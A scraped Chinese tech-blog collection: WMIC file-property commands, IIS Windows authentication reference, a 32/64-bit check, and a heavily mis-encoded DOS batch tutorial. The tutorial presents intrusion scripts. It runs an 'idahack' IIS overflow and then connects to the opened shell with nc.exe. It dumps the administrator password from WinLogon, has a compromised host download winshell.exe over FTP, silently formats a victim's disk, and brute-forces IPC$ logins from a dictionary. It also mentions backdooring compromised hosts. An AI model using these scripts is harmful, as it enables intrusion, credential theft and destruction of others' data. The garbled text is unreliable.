狠狠综合久久综合88亚洲,亚洲中文字幕无码av永久,国产偷国产偷亚洲高清在线

How to check file properties through WMI command line (fw)

九宝 — Wed, 07 Dec 2011 14:29:00 GMT

How to check file properties through WMI command line

24.Sep.2009 | by Gusac | Filed in: Articles, Tutorials

With the lack of Graphical Interface on Windows 2008 Core server there comes a need of performing a lot of task through command line. One of which is checking file properties like file version, path, product verision etc. Luckily we have a command that makes this task simple. On a side note, We can also run the same command on other operating systems like Windows Xp, 2003, vista.

Here is the command:
wmic datafile where name='c:\\windows\\system32\\notepad.exe'

Click here to view the enlarged screenshot

Notice that we have used two backslashes \\ in the file path. Also, notice that the path is enclosed in the single quotes.
The output will be confusing to read in command prompt window. To read and understand it better, we can take the output in text format and read it in notepad.

While doing so, please do NOT wrap the text.
wmic datafile where name='c:\\windows\\system32\\notepad.exe' > out.txt

Click here to view the enlarged screenshot

The output will reveal the file properties like Hidden, Path, Drive, Version Caption, Access rights etc.

To get one particular property of a file we need to modify the command a little bit. We need to use the GET Alias injunction to the command mentioned above. Let's say we want to check the version for the file notepad.exe. The command that is used for this is:
wmic datafile where name='c:\\windows\\system32\\notepad.exe' get version

Similarily, there is a list of properties that can be fetched through this command line. They are:

Access Rights
Caption
Class Name
Compressed
Compression Method
Computer System Class Name
Computer System Name
Creation Date
Current File Open Count
Description
Drive
Eight Dot Three File Name
Encrypted
Encryption Method
File Extension
File Name
File System Class Name
File System Name
File Type
Hidden
Install Date
Last Accessed
Last Modified
Manufacturer
Name
Path
Readable
Should Be Archived
Size
Status
System File
Version
Writeable

九宝 2011-12-07 22:29 发表评论

Windows Authentication

九宝 — Fri, 16 Sep 2011 13:46:00 GMT

from http://www.iis.net/ConfigReference/system.webServer/security/authentication/windowsAuthentication

Overview

The element defines configuration settings for the Internet Information Services (IIS) 7 Windows authentication module. You can use Windows authentication when your IIS 7 server runs on a corporate network that is using Microsoft Active Directory service domain identities or other Windows accounts to identify users. Because of this, you can use Windows authentication whether or not your server is a member of an Active Directory domain.

Windows authentication (formerly named NTLM, and also referred to as Windows NT Challenge/Response authentication) is a secure form of authentication because the user name and password are hashed before being sent across the network. When you enable Windows authentication, the client browser sends a strongly hashed version of the password in a cryptographic exchange with your Web server.

Windows authentication supports two authentication protocols, Kerberos and NTLM, which are defined in the element. When you install and enable Windows authentication on IIS 7, the default protocol is Kerberos. The element can also contain a useKernelMode attribute that configures whether to use the kernel mode authentication feature that is new to Windows Server 2008.

Windows authentication is best suited for an intranet environment for the following reasons:

Client computers and Web servers are in the same domain.
Administrators can make sure that every client browser is Internet Explorer 2.0 or later.
HTTP proxy connections, which are not supported by NTLM, are not required.
Kerberos version 5 requires a connection to Active Directory, which is not feasible in an Internet environment.

New in IIS 7.5

The element was introduced in IIS 7.5, which allows you to configure the settings for the new extended protection features that have been integrated into Windows authentication.

Compatibility

Version	Notes
IIS 7.5	The element was added in IIS 7.5.
IIS 7.0	The element was introduced in IIS 7.0.
IIS 6.0	The element replaces portions of the IIS 6.0 AuthType and AuthFlags metabase properties.

Setup

The default installation of IIS 7 does not include the Windows authentication role service. To use Windows authentication on IIS, you must install the role service, disable Anonymous authentication for your Web site or application, and then enable Windows authentication for the site or application.

Note: After you install the role service, IIS 7 commits the following configuration settings to the ApplicationHost.config file.

Windows Server 2008 or Windows Server 2008 R2

On the taskbar, click Start, point to Administrative Tools, and then click Server Manager.
In the Server Manager hierarchy pane, expand Roles, and then click Web Server (IIS).
In the Web Server (IIS) pane, scroll to the Role Services section, and then click Add Role Services.
On the Select Role Services page of the Add Role Services Wizard, select Windows Authentication, and then click Next.
On the Confirm Installation Selections page, click Install.
On the Results page, click Close.

Windows Vista or Windows 7

On the taskbar, click Start, and then click Control Panel.
In Control Panel, click Programs and Features, and then click Turn Windows Features on or off.
Expand Internet Information Services, then World Wide Web Services, then Security.
Select Windows Authentication, and then click OK.

How To

How to enable Windows authentication for a Web site, Web application, or Web service

Open Internet Information Services (IIS) Manager:
- If you are using Windows Server 2008 or Windows Server 2008 R2:
  - On the taskbar, click Start, point to Administrative Tools, and then click Internet Information Services (IIS) Manager.
- If you are using Windows Vista or Windows 7:
  - On the taskbar, click Start, and then click Control Panel.
  - Double-click Administrative Tools, and then double-click Internet Information Services (IIS) Manager.
In the Connections pane, expand the server name, expand Sites, and then the site, application, or Web service for which you want to enable Windows authentication.
Scroll to the Security section in the Home pane, and then double-click Authentication.
In the Authentication pane, select Windows Authentication, and then click Enable in the Actions pane.

How to enable Extended Protection for Windows authentication

Open Internet Information Services (IIS) Manager:
- If you are using Windows Server 2008 or Windows Server 2008 R2:
  - On the taskbar, click Start, point to Administrative Tools, and then click Internet Information Services (IIS) Manager.
- If you are using Windows Vista or Windows 7:
  - On the taskbar, click Start, and then click Control Panel.
  - Double-click Administrative Tools, and then double-click Internet Information Services (IIS) Manager.
In the Connections pane, expand the server name, expand Sites, and then the site, application, or Web service for which you want to enable Extended Protection for Windows authentication.
Scroll to the Security section in the Home pane, and then double-click Authentication.
In the Authentication pane, select Windows Authentication.
Click Enable in the Actions pane.
Click Advanced Settings in the Actions pane.
When the Advanced Settings dialog box appears, select one of the following options in the Extended Protection drop-down menu:
- Select Accept if you want to enable extended protection while providing down-level support for clients that do not support extended protection.
- Select Required if you want to enable extended protection without providing down-level support.
Click OK to close the Advanced Settings dialog box.

Configuration

The element is configurable at the site, application, or virtual directory level in the ApplicationHost.config file.

Attributes

Attribute	Description
`authPersistNonNTLM`	Optional Boolean attribute. Specifies whether IIS automatically reauthenticates every non-NTLM (for example, Kerberos) request, even those on the same connection. False enables multiple authentications for the same connections. Note: A setting of true means that the client will be authenticated only once on the same connection. IIS will cache a token or ticket on the server for a TCP session that stays established. The default is `false`.
`authPersistSingleRequest`	Optional Boolean attribute. Setting this flag to true specifies that authentication persists only for a single request on a connection. IIS resets the authentication at the end of each request, and forces reauthentication on the next request of the session. The default value is `false`.
`enabled`	Required Boolean attribute. Specifies whether Windows authentication is enabled. The default value is `false`.
`useKernelMode`	Optional Boolean attribute. Specifies whether Windows authentication is done in kernel mode. True specifies that Windows authentication uses kernel mode. Kernel-mode authentication may improve authentication performance and prevent authentication problems with application pools that are configured to use a custom identity. As a best practice, do not disable this setting if you use Kerberos authentication and have a custom identity on the application pool. The default is `true`.

Child Elements

Element	Description
`extendedProtection`	Optional element. Specifies extended protection options for Windows authentication. Note: This element was added in IIS 7.5.
`providers`	Optional element. Specifies security support providers used for Windows authentication.

Configuration Sample

The following default element is configured at the root ApplicationHost.config file in IIS 7.0, and disables Windows authentication by default. It also defines the two Windows authentication providers for IIS 7.0.

The following example enables Windows authentication and disables Anonymous authentication for a Web site named Contoso.

Sample Code

The following examples disable Anonymous authentication for a site named Contoso, then enable Windows authentication for the site.

AppCmd.exe

appcmd.exe set config "Contoso" -section:system.webServer/security/authentication/anonymousAuthentication /enabled:"False" /commit:apphost

appcmd.exe set config "Contoso" -section:system.webServer/security/authentication/windowsAuthentication /enabled:"True" /commit:apphost

Note: You must be sure to set the commit parameter to apphost when you use AppCmd.exe to configure these settings. This commits the configuration settings to the appropriate location section in the ApplicationHost.config file.

C#

using System;
using System.Text;
using Microsoft.Web.Administration;

internal static class Sample {

   private static void Main() {

      using(ServerManager serverManager = new ServerManager()) { 
         Configuration config = serverManager.GetApplicationHostConfiguration();

         ConfigurationSection anonymousAuthenticationSection = config.GetSection("system.webServer/security/authentication/anonymousAuthentication", "Contoso");
         anonymousAuthenticationSection["enabled"] = false;

         ConfigurationSection windowsAuthenticationSection = config.GetSection("system.webServer/security/authentication/windowsAuthentication", "Contoso");
         windowsAuthenticationSection["enabled"] = true;

         serverManager.CommitChanges();
      }
   }
}

VB.NET

Imports System
Imports System.Text
Imports Microsoft.Web.Administration

Module Sample
   Sub Main()
      Dim serverManager As ServerManager = New ServerManager
      Dim config As Configuration = serverManager.GetApplicationHostConfiguration

      Dim anonymousAuthenticationSection As ConfigurationSection = config.GetSection("system.webServer/security/authentication/anonymousAuthentication", "Contoso")
      anonymousAuthenticationSection("enabled") = False

      Dim windowsAuthenticationSection As ConfigurationSection = config.GetSection("system.webServer/security/authentication/windowsAuthentication", "Contoso")
      windowsAuthenticationSection("enabled") = True

      serverManager.CommitChanges()
   End Sub
End Module

JavaScript

var adminManager = new ActiveXObject('Microsoft.ApplicationHost.WritableAdminManager');
adminManager.CommitPath = "MACHINE/WEBROOT/APPHOST";

var anonymousAuthenticationSection = adminManager.GetAdminSection("system.webServer/security/authentication/anonymousAuthentication", "MACHINE/WEBROOT/APPHOST/Contoso");
anonymousAuthenticationSection.Properties.Item("enabled").Value = false;

var windowsAuthenticationSection = adminManager.GetAdminSection("system.webServer/security/authentication/windowsAuthentication", "MACHINE/WEBROOT/APPHOST/Contoso");
windowsAuthenticationSection.Properties.Item("enabled").Value = true;

adminManager.CommitChanges();

VBScript

Set adminManager = CreateObject("Microsoft.ApplicationHost.WritableAdminManager")
adminManager.CommitPath = "MACHINE/WEBROOT/APPHOST"

Set anonymousAuthenticationSection = adminManager.GetAdminSection("system.webServer/security/authentication/anonymousAuthentication", "MACHINE/WEBROOT/APPHOST/Contoso")
anonymousAuthenticationSection.Properties.Item("enabled").Value = False

Set windowsAuthenticationSection = adminManager.GetAdminSection("system.webServer/security/authentication/windowsAuthentication", "MACHINE/WEBROOT/APPHOST/Contoso")
windowsAuthenticationSection.Properties.Item("enabled").Value = True

adminManager.CommitChanges()

九宝 2011-09-16 21:46 发表评论

How To Determine if Your Computer Is 32-Bit or 64-Bit(forward)

九宝 — Thu, 15 Sep 2011 19:34:00 GMT

how to check window version

run: Winver

Here's How:

Open the System Information

Open the Start menu, and click on Programs -> Accessories -> System Tools -> System Information
Look in the System Summary

The System Information tool will display detailed information about your Windows operating system. Once opened it will show the "System Summary" – it’s an overview of your computer and operating system.
Look for the System Type Item

On the right hand side of the window you will see a list of items. Look for the item called "System Type".

The value of this item will tell you whether your computer is 32-bit or 64-bit:
- x86-based PC: It’s a 32-bit computer.
- x64-based PC: It’s a 64-bit computer.

九宝 2011-09-16 03:34 发表评论

批处�?如何对作参数的文件名�q�行操作

九宝 — Mon, 01 Jun 2009 08:01:00 GMT

例如�Q�第三个参数�?c:/temp/a.txt
如何取第三个参数的文件�\�?c:/temp
SET BIN_DIR=%1                ::取第一个参�?br /> SET RES_DIR=%2                ::取第二个参数
SET TARGET_FILE=%3            ::取第三个参数
SET TARGET_FILE_NAME=%~nx3    ::取第三个参数的文件名
SET TARGET_DIR=%~dp3          ::取第三个参数的�\�?/span>

如何对作参数的文件名�q�行操作?

ECHO %~[]

的取值如�?/span>�Q?/span>

%~	扩展%�Q�然后去除双引号�Q?/span>" "�Q?/span>
%~f	扩展%, 取文件的全�\�?/span>/文�g�?/span>/扩展名，�U�字�W�串处理
%~d	扩展%, 取文件的驱动器名
%~p	扩展%, 取文件的路径�?/span>
%~n	扩展%, 取文件名�Q�不包括扩展�?/span>
%~x	扩展%, 取文件的扩展�?/span>
%~s	扩展%, 只包括短文�g名的全�\�?/span>/文�g�?/span>/扩展�?/span>
%~t	扩展%, 文�g的最后修�Ҏ��?/span>
%~z	扩展%, 文�g的大��?/span>
%~a	扩展%, 文�g的属�?/span>
%~$`:`	一般是环境变量PATH, 从中��L��W�一个匹配的文�g名是%1的文件的全�\径，如果找不到则展开为空

以上参数可以�l�合�Q�其格式是：

%~[{f|d|a|z|s|n|x|t|p}][$:]

九宝 2009-06-01 16:01 发表评论

(�? �l�典的DOS批处理入门教�E?2)�Q�徏议耐心看完�Q�必有收��P��

九宝 — Mon, 01 Jun 2009 07:52:00 GMT

关键�? dos批处�?自动化安装测�?/strong>

目前在做自动化安装测试的�q�程中要用到大量dos批处理的应用�Q�所以脓一��?br />

很好的DOS批处理入门教�E?呵呵�?/span>

######################################################################
4. ��单批处理文�g概念
######################################################################

echo This is test > a.txt
type a.txt
echo This is test 11111 >> a.txt
type a.txt
echo This is test 22222 > a.txt
type a.txt
�W�二个echo是追�?
�W�三个echo��清�I�a.txt 重新创徏 a.txt

netstat -n | find "3389"
�q�个��要列出所有连�?389的用��L��ip.

________________test.bat___________________________________________________
@echo please care
echo plese care 1111
echo plese care 2222
echo plese care 3333
@echo please care
@echo plese care 1111
@echo plese care 2222
@echo plese care 3333
rem 不显�C�注释语�?本行昄��
@rem 不显�C�注释语�?本行不显�C?
@if exist %windir%system32find.exe (echo Find find.exe !!!) else (echo ERROR: Not find find.exe)
@if exist %windir%system32fina.exe (echo Find fina.exe !!!) else (echo ERROR: Not find fina.exe)
___________________________________________________________________________

下面我们以具体的一个idahack�E�序��是ida�q�程溢出��Z��?应该是很��单的.

___________________ida.bat_________________________________________________
@rem ver 1.0
@if NOT exist %windir%system32idahack.exe echo "ERROR: dont find idahack.exe"
@if NOT exist %windir%system32nc.exe echo "ERROR: dont find nc.exe"

@if "%1" =="" goto USAGE
@if NOT "%2" =="" goto SP2

:start
@echo Now start ...
@ping %1
@echo chinese win2k:1 sp1:2 sp2:3
idahack.exe %1 80 1 99 >%temp%_tmp
@echo "prog exit code [%errorlevel%] idahack.exe"
@type %temp%_tmp
@find "good luck :)" %temp%_tmp
@echo "prog exit code [%errorlevel%] find [goog luck]"
@if NOT errorlevel 1 nc.exe %1 99
@goto END

:SP2
@idahack.exe %1 80 %2 99 %temp%_tmp
@type %temp%_tmp
@find "good luck :)" %temp%_tmp
@if NOT errorlevel 1 nc.exe %1 99
@goto END

:USAGE
@echo Example: ida.bat IP
@echo Example: ida.bat IP (2,3)

:END
_____________________ida.bat__END_________________________________

下面我们再来�W�二个文�?��是得到administrator的口�?
大多��C�h说得不到.其实是自��q��没有输入正确的信�?

___________________________fpass.bat____________________________________________
@rem ver 1.0
@if NOT exist %windir%system32findpass.exe echo "ERROR: dont find findpass.exe"
@if NOT exist %windir%system32pulist.exe echo "ERROR: dont find pulist.exe"

@echo start....
@echo ____________________________________
@if "%1"=="" goto USAGE
@findpass.exe %1 %2 %3 >> %temp%_findpass.txt
@echo "prog exit code [%errorlevel%] findpass.exe"
@type %temp%_findpass.txt
@echo ________________________________Here__pass★★★★★★★★
@ipconfig /all >>%temp%_findpass.txt
@goto END

:USAGE
@pulist.exe >%temp%_pass.txt
@findstr.exe /i "WINLOGON explorer internat" %temp%_pass.txt
@echo "Example: fpass.bat %1 %2 %3 %4 !!!"
@echo "Usage: findpass.exe DomainName UserName PID-of-WinLogon"

:END
@echo " fpass.bat %COMPUTERNAME% %USERNAME% administrator "
@echo " fpass.bat end [%errorlevel%] !"
_________________fpass.bat___END___________________________________________________________

�q�有一个就是已�l�通过telnet登陆了一个远�E�主�?怎样上传文�g(win)
依次在窗口输入下面的东西. 当然了也可以全部拯��.Ctrl+V�q�去. 然后��q��待吧!!

echo open 210.64.x.4 3396>w
echo read>>w
echo read>>w
echo cd winnt>>w
echo binary>>w
echo pwd >>w
echo get wget.exe >>w
echo get winshell.exe >>w
echo get any.exe >>w
echo quit >>w
ftp -s:w

批处理，说白了就是DOS操作。有��为DOS操作�q�时了、落后了�Q�其实不然。DOS操作最大的好处��在于快、不留痕。在许多时候，Windows操作是根本解决不了问题的�Q�必��d��助DOS操作�?br />
　　必备常识�Q�批处理的编写和修改

　　打开��C��本，��要�~�写的内容写在里面。在存�ؓbat文�g卛_��。修改也可以用记事本打开�q�行修改�?br />
　　批处理运用一�Q�扫描本地端�?br />
　　�q�个功能优化大师有，��是扫描哪个端口与internet�q�接和连接ip。这�Q��ؓ及时发现�q�拦截非法连接有着不可取代的功功�?br />
　　然而，启动优化大师太慢了，而且太烦了，不利于随��Z��用。因此，�~�写一个这��L��批处理来解决问题��显得尤为重要了�?br />
　　************************************************************
　　代码�Q?br /> 　　netstat -n
　　pause
　　附：也可在每一行开头添�?#8220;@”�Q�这样命令就不会昄��出来�?br /> 　　************************************************************

　　批处理运用二�Q�查常见病毒

　　其实�Q�对于上�|�的人来��_��遇到病毒是在所隑օ�的。然而，如果真的不幸感染�Q�怎样才能发现呢？��N��真的要买昂贵的杀毒��Y件吗�Q�不一定�?br />
　　我们可以�~�写批处理来查一些常见的�|�络病毒。如果确认感染病毒，可以下蝲专用杀毒工兯��行查杀�Q�或采取其他途径杀毒�?br />
　　下面�Q�我以欢乐时光�ؓ例进行分析：
　
　　��L��Ӟ��1.bat
　　其它文�g�Q?.bat 3.bat

　　************************************************************
　　1.bat代码�Q?br /> 　　@if exist c:\folder.htt call 2.bat
　　@if exist d:\folder.htt call 2.bat
　　@if exist e:\folder.htt call 2.bat
　　@if exist f:\folder.htt call 2.bat
　　************************************************************
　　2.bat代码�Q?br /> 　　@echo 发现�Ƣ乐时光病毒�Q?br /> 　　@call 3.bat
　　@pause
　　************************************************************
　　3.bat代码�Q?br /> 　　@c:
　　@dir *.htt *.ini /s/a>1.txt
　　@d:
　　@dir *.htt *.ini /s/a>1.txt
　　@e:
　　@dir *.htt *.ini /s/a>1.txt
　　************************************************************

　　�q�样�Q�如果中毒，那么必定会存在大量folder.htt和Desktop.ini�Q�通过�q�样可以�_�略的检查计��机是否感染病毒�?br />
　　批处理运用三�Q�文件处�?br />
　　假设�Q�我要大规模的做文�g的移动、删除等�Q�如果在Windows里操作不免会出现错误�Q�而且�q�些错误不易察觉。因此，用批处理�q�行操作�Q�不但简单易行，而且�Ҏ��发现错误�q�可以及时纠正�?br />
　　例如�Q�我要将D盘的htm文�g�U�d��到E盘，再格式化D盘，然后��文件移回D盘，�q�改后缀为html�?br />
　　************************************************************
　　1.bat代码�Q?br /> 　　@E:
　　@Md d
　　@D:
　　@Copy *.htm e:\d
　　@if exist e:\d\*.htm call 2.bat
　　************************************************************
　　2.bat代码�Q?br /> 　　@Format d:/q
　　@Copy e:\d\*.htm d:
　　@D:
　　@Ren *.htm *.html
　　************************************************************

　　从例子中�Q�可以看出，如果一旦出现问题，是很�Ҏ��被发现的。从而，也证明了批处理的可用性�?br />
　　关于批处理的�q�用�Q�可以说博大�_�深�Q�变化莫��。希望大家能够用DOS命��o��M��化它�Q�这��h��能让其更好的为我们服务�?

批处理命�?br />
1.Echo 命��o

打开回显或关闭请求回昑֊�能，或显�C�消息。如果没有�Q何参敎ͼ�echo 命��o��显�C�当前回显设�|��?br />
语法�Q�echo [{on|off}] [message]
Sample�Q�echo off / echo hello world
在实际应用中我们会把�q�条命��o和重定向�W�号�Q�也�U�Cؓ��道�W�号�Q�一般用> >> ^�Q�结合来实现输入一些命令到特定格式的文件中.�q�将在以后的例子中体现出来�?br />
2.@ 命��o

表示不显�C�@后面的命令，在入侵过�E�中�Q�例如��用批处理来格式化敌�h的硬盘）自然不能让对方看��C��使用的命令啦�?br /> Sample�Q�@echo off
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset (format �q�个命��o是不可以使用/y�q�个参数的，可喜的是微��Y留了个autoset�q�个参数�l�我们，效果�?y是一��L��?

3.Goto 命��o
指定跌��{到标�{�，扑ֈ�标签后，�E�序��处理从下一行开始的命��o�?br />
语法�Q�goto label �Q�label是参敎ͼ�指定所要�{向的批处理程序中的行。）
Sample�Q?br /> if {%1}=={} goto noparms
if {%2}=={} goto noparms�Q�如果这里的if�?1�?2你不明白的话�Q�先跌��去，后面会有详细的解释。）
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
标签的名字可以随便�v�Q�但是最好是有意义的字母啦，字母前加个：用来表示�q�个字母是标�{�，goto命��o��是�Ҏ��q�个�Q�来��L��下一步蟩到到那里。最好有一些说明这样你别�h看�v来才会理解你的意囑֕��?br />
4.Rem 命��o

注释命��o�Q�在C语言中相当与/*--------*/,它�ƈ不会被执行，只是起一个注释的作用�Q�便于别人阅��d��你自己日后修攏V�?br /> Rem Message
Sample�Q�@Rem Here is the description.

5.Pause 命��o

�q�行 Pause 命��o�Ӟ��显�C�Z��面的消息�Q?
Press any key to continue . . .
Sample�Q?br /> @echo off
:begin
copy a:*.* d�Q�\back
echo Please put a new disk into driver A
pause
goto begin
在这个例子中�Q�驱动器 A 中磁盘上的所有文件均复制到d:\back中。显�C�的注释提示您将另一张磁盘放入驱动器 A �Ӟ��pause 命��o会�ɽE�序挂�v�Q�以便您更换��盘�Q�然后按��L��键��l�处理�?br />
6.Call 命��o

从一个批处理�E�序调用另一个批处理�E�序�Q��ƈ且不�l�止父批处理�E�序。call 命��o接受用作调用目标的标�{�。如果在脚本或批处理文�g外��?Call�Q�它��不会在命��o行�v作用�?br />
语法�Q�call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]

参数�Q�[Drive:}[Path] FileName
指定要调用的批处理程序的位置和名�U�。filename 参数必须��h�� .bat �?.cmd 扩展名�?br />
7.start 命��o

调用外部�E�序�Q�所有的DOS命��o和命令行�E�序都可以由start命��o来调用�?br /> 入��R常用参数�Q?br /> MIN 开始时�H�口最��化
SEPARATE 在分开的空间内开�?16 �?Windows �E�序
HIGH �?HIGH 优先�U�类别开始应用程�?br /> REALTIME �?REALTIME 优先�U�类别开始应用程�?br /> WAIT 启动应用�E�序�q�等候它�l�束
parameters �q�些��Z��送到命��o/�E�序的参�?br /> 执行的应用程序是 32-�?GUI 应用�E�序�Ӟ��CMD.EXE 不等应用�E�序�l�止��p��回命令提�C�。如果在命��o脚本内执行，该新行�ؓ则不会发生�?br />
8.choice 命��o

choice 使用此命令可以让用户输入一个字�W�，从而运行不同的命��o。��用时应该�?c:参数�Q�c:后应写提�C�可输入的字�W�，之间无空根{��它的返回码�?234……

�? choice /c:dme defrag,mem,end
��显�C?br /> defrag,mem,end[D,M,E]?
Sample�Q?br /> Sample.bat的内容如�?
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag �Q�应先判断数值最高的错误码）
if errorlevel 2 goto mem
if errotlevel 1 goto end

:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye

此文件运行后�Q�将昄�� defrag,mem,end[D,M,E]? 用户可选择d m e �Q�然后if语句��作出判断，d表示执行标号为defrag的程序段�Q�m表示执行标号为mem的程序段�Q�e表示执行标号为end的程序段�Q�每个程序段最后都以goto end��程序蟩到end标号处，然后�E�序��显�C�good bye�Q�文件结束�?br />
9.If 命��o

if 表示��判断是否符合规定的条�g�Q�从而决定执行不同的命��o�?有三�U�格�?

1、if "参数" == "字符�? 待执行的命��o
参数如果�{�于指定的字�W�串�Q�则条�g成立�Q�运行命令，否则�q�行下一句�?注意是两个等��P��
如if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms

2、if exist 文�g�?待执行的命��o
如果有指定的文�g�Q�则条�g成立�Q�运行命令，否则�q�行下一句�?br /> 如if exist config.sys edit config.sys

3、if errorlevel / if not errorlevel 数字待执行的命��o
如果�q�回码等于指定的数字�Q�则条�g成立�Q�运行命令，否则�q�行下一句�?br /> 如if errorlevel 2 goto x2
DOS�E�序�q�行旉��会返回一个数字给DOS�Q�称为错误码errorlevel或称�q�回码，常见的返回码�?�?�?br />
10.for 命��o

for 命��o是一个比较复杂的命��o�Q�主要用于参数在指定的范围内循环执行命��o�?br /> 在批处理文�g中��?FOR 命��o�Ӟ��指定变量请��?%%variable

for {%variable|%%variable} in (set) do command [ CommandLineOptions]
%variable 指定一个单一字母可替换的参数�?br /> (set) 指定一个或一�l�文件。可以��用通配�W��?br /> command 指定�Ҏ��个文件执行的命��o�?br /> command-parameters 为特定命令指定参数或命��o行开兟�?br /> 在批处理文�g中��?FOR 命��o�Ӟ��指定变量请��?%%variable
而不要用 %variable。变量名�U�是区分大小写的�Q�所�?%i 不同�?%I

如果命��o扩展名被启用�Q�下列额外的 FOR 命��o格式会受�?br /> 支持:

FOR /D %variable IN (set) DO command [command-parameters]

如果集中包含通配�W�，则指定与目录名匹配，而不与文�?br /> 名匹配�?br />
FOR /R [[drive:]path] %variable IN (set) DO command [command-

��查以 [drive:]path 为根的目录树�Q�指向每个目录中�?br /> FOR 语句。如果在 /R 后没有指定目录，则��用当�?br /> 目录。如果集仅�ؓ一个单�?.)字符�Q�则枚�D该目录树�?br />
FOR /L %variable IN (start,step,end) DO command [command-para

该集表示以增量�Ş式从开始到�l�束的一个数字序列�?br /> 因此�Q?1,1,5) ��生序�?1 2 3 4 5�Q?5,-1,1) ��?br /> 序列 (5 4 3 2 1)�?br />
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (command) DO command

或者，如果�?usebackq 选项:

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (command) DO command

filenameset ��Z��个或多个文�g名。��l�到 filenameset 中的
下一个文件之前，每䆾文�g都已被打开、读取�ƈ�l�过处理�?br /> 处理包括��d��文�g�Q�将其分成一行行的文字，然后��每�?br /> 解析成零或更多的�W�号。然后用已找到的�W�号字符串变量�?br /> 调用 For 循环。以默认方式�Q?F 通过每个文�g的每一行中分开
的第一个空白符受��蟩�q�空白行。您可通过指定可�?"options"
参数替代默认解析操作。这个带引号的字�W�串包括一个或多个
指定不同解析选项的关键字。这些关键字�?

eol=c - 指一个行注释字符的结��?��׃��?
skip=n - 指在文�g开始时忽略的行数�?br /> delims=xxx - 指分隔符集。这个替换了�I�格和蟩格键�?br /> 默认分隔�W�集�?br /> tokens=x,y,m-n - 指每行的哪一个符可��传递到每个�q�代
�?for 本��n。这会导致额外变量名�U�的
格式��Z��个范围。通过 nth �W�号指定 m
�W�号字符串中的最后一个字�W�星��P��
那么额外的变量将在最后一个符可��析之
分配�q�接受行的保留文本�?br /> usebackq - 指定新语法已在下�c�L��况中使用:
在作为命令执行一个后引号的字�W�串�q�且
引号字符为文字字�W�串命��o�q�允许在 fi
中��用双引号扩�v文�g名称�?br />
sample1:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command

会分�?myfile.txt 中的每一行，忽略以分��h��头的那些行，��?br /> 每行中的�W�二个和�W�三个符号传递给 for �E�序体；用逗号�?�?br /> �I�格定界�W�号。请注意�Q�这�?for �E�序体的语句引用 %i �?br /> 取得�W�二个符��P��引用 %j 来取得第三个�W�号�Q�引�?%k
来取得第三个�W�号后的所有剩余符受��对于带有空格的文�g
名，您需要用双引号将文�g名括��h��。�ؓ了用�q�种方式来��
用双引号�Q�您�q�需要��?usebackq 选项�Q�否则，双引号会
被理解成是用作定义某个要分析的字�W�串的�?br />
%i 专门�?for 语句中得到说明，%j �?%k 是通过
tokens= 选项专门得到说明的。您可以通过 tokens= 一�?br /> 指定最�?26 个符��P��只要不试图说明一个高于字�?z �?br /> Z 的变量。请��C��Q�FOR 变量是单一字母、分大小写和全局的；
同时不能�?52 个以上都在��用中�?br />
您还可以在相��d��W�串上��?FOR /F 分析逻辑�Q�方法是�Q?br /> 用单引号��括号之间的 filenameset 括�v来。这��P��该字�W?br /> 串会被当作一个文件中的一个单一输入行�?br />
最后，您可以用 FOR /F 命��o来分析命令的输出。方法是�Q�将
括号之间�?filenameset 变成一个反括字�W�串。该字符串会
被当作命令行�Q�传递到一个子 CMD.EXE�Q�其输出会被抓进
内存�Q��ƈ被当作文件分析。因此，以下例子:

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

会枚丑ֽ�前环境中的环境变量名�U��?br />
另外�Q�FOR 变量参照的替换已被增强。您现在可以使用下列
选项语法:

~I - 删除��M��引号(")�Q�扩�?%I
%~fI - ��?%I 扩充��C��个完全合格的路径�?br /> %~dI - 仅将 %I 扩充��C��个驱动器�?br /> %~pI - 仅将 %I 扩充��C��个�\�?br /> %~nI - 仅将 %I 扩充��C��个文件名
%~xI - 仅将 %I 扩充��C��个文件扩展名
%~sI - 扩充的�\径只含有短名
%~aI - ��?%I 扩充到文件的文�g属�?br /> %~tI - ��?%I 扩充到文件的日期/旉��
%~zI - ��?%I 扩充到文件的大小
%~$PATH:I - 查找列在路径环境变量的目录，�q�将 %I 扩充
到找到的�W�一个完全合格的名称。如果环境变�?br /> 未被定义�Q�或者没有找到文�Ӟ��此组合键会扩�?br /> �I�字�W�串

可以�l�合修饰�W�来得到多重�l�果:

%~dpI - 仅将 %I 扩充��C��个驱动器号和路径
%~nxI - 仅将 %I 扩充��C��个文件名和扩展名
%~fsI - 仅将 %I 扩充��C��个带有短名的完整路径�?br /> %~dp$PATH:i - 查找列在路径环境变量的目录，�q�将 %I 扩充
到找到的�W�一个驱动器号和路径�?br /> %~ftzaI - ��?%I 扩充到类��D��出线路的 DIR

在以上例子中�Q?I �?PATH 可用其他有效数��g��ѝ�?~ 语法
用一个有效的 FOR 变量名终止。选取�c�M�� %I 的大写变量名
比较易读�Q�而且避免与不分大��写的组合键��h��?br />
以上是MS的官方帮助，下面我们丑և�个例子来具体说明一下For命��o在入侵中的用途�?br />
sample2�Q?br />
利用For命��o来实现对一台目标Win2k��L��的暴力密码破解�?br /> 我们用net use \\ip\ipc$ "password" /u:"administrator"来尝试这和目标主��行连接，当成功时��C��密码�?br /> 最主要的命令是一条：for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator"
用i%来表�C�admin的密码，在dict.txt中这个取i%的值用net use 命��o来连接。然后将�E�序�q�行�l�果传递给find命��o�Q�－
for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"|find ":命��o成功完成">>D:\ok.txt �Q�这样就ko了�?br />
sample3�Q?br />
你有没有�q�手里有大量肉鸡�{�着你去�U�后门＋木马呢？�Q�当数量特别多的时候，原本很开心的一件事都会变得很郁��P��Q�。文章开头就谈到使用批处理文�Ӟ��可以��化日常或重复性�Q务。那么如何实现呢�Q�呵呵，看下��M��׃��明白了�?br />
